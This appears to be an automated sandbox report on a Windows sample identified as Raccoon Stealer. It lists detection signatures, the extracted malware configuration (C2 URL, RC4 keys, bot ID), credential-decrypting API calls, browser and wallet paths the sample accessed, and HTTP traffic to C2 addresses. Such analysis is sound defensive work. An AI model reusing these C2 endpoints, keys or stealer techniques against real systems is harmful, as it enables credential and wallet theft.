
Windows Analysis Report KnZsSmDyF3.exe

Overview

General Information

Sample Name: KnZsSmDyF3.exe
Analysis ID: 452449
MD5: aa717550158faf72a3776ce7115f80d3
SHA1: 6d0bbf0b16b7f9e5948c18f488b5428b329821f3
SHA256: b61998322190573353437177fd9a48263cae5d867055800d86b5fcf006253fdc
Tags: exe, RaccoonStealer

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Raccoon Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to steal Internet Explorer form passwords
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Process Tree

  • System is w10x64
  • KnZsSmDyF3.exe (PID: 4712 cmdline: 'C:\Users\user\Desktop\KnZsSmDyF3.exe' MD5: AA717550158FAF72A3776CE7115F80D3)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://telete.in/jagressor_kz", "Bot ID": "cd8dc1031358b1aec55cc6bc447df1018b068607", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
Process Memory Space: KnZsSmDyF3.exe PID: 4712 | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
Process Memory Space: KnZsSmDyF3.exe PID: 4712 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author
1.2.KnZsSmDyF3.exe.400000.0.raw.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
1.2.KnZsSmDyF3.exe.400000.0.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security
1.2.KnZsSmDyF3.exe.2670e50.4.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack | Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://telete.in/jagressor_kz", "Bot ID": "cd8dc1031358b1aec55cc6bc447df1018b068607", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
Multi AV Scanner detection for domain / URL
Source: telete.in | Virustotal: Detection: 12%
Source: https://telete.in/jagressor_kz | Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: KnZsSmDyF3.exe | Virustotal: Detection: 62%
Source: KnZsSmDyF3.exe | Metadefender: Detection: 28%
Source: KnZsSmDyF3.exe | ReversingLabs: Detection: 75%
Yara detected Raccoon Stealer
Source: Yara match | File source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY
Machine Learning detection for sample
Source: KnZsSmDyF3.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0040CD04 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,1_2_0040CD04
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0040EE22 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,1_2_0040EE22
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0040D407 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,1_2_0040D407
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_004274BC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,1_2_004274BC
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0042768F lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,1_2_0042768F
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0040DE52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,1_2_0040DE52
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0040C12D __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_0040C12D
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0041E61E __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,1_2_0041E61E

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Unpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack
Source: KnZsSmDyF3.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.3:49718 version: TLS 1.2
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: .C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_0043BDC7 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_0043BDC7
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | Code function: 1_2_004329F2 __EH_prolog,GetLogicalDriveStringsA,1_2_004329F2
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://telete.in/jagressor_kz
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 09:28:00 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:06 GMTETag: "60e9b7d6-dfcff"Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.228.114.197
Source: global traffic | HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
Source: global traffic | HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1392Host: 94.228.114.197
Source: Joe Sandbox View | IP Address: 195.201.225.248
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown | TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 09:28:04 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:05 GMTETag: "60e9b7d5-2b281b"Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
Source: global traffic | HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
Source: unknown | DNS traffic detected: queries for: telete.in
Source: unknown | HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.228.114.197
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197/
Source: KnZsSmDyF3.exe, 00000001.00000003.207802227.0000000000D56000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f277U
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f=jsonoL
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f2y
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f4
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197/2t
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197/I_
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197/S
Source: KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp | String found in binary or memory: http://94.228.114.197/dhHq
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: softokn3.dll.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0Y
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
                      Source: sqlite3.dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=pV
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219853041.0000000000DB0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/jagressor_kz
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/jagressor_kzn-
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/org/img/t_logo.png
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220797019.000000004C8CD000.00000004.00000001.sdmpString found in binary or memory: https://wa228.114.197/
                      Source: softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: KnZsSmDyF3.exe, 00000001.00000003.217777569.0000000000DC3000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0H
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0n_
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0renc
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.3:49718 version: TLS 1.2

                      E-Banking Fraud:

                      Yara detected Raccoon Stealer
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0043C3A8: DeviceIoControl,GetLastError
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_004340F3
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0043454E
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0040C72C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0041E7C4
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0040CD04
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0040EE22
